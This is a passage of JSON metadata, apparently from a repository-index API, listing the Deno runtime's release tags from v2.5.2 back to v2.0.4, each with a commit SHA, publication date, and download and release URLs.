odeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2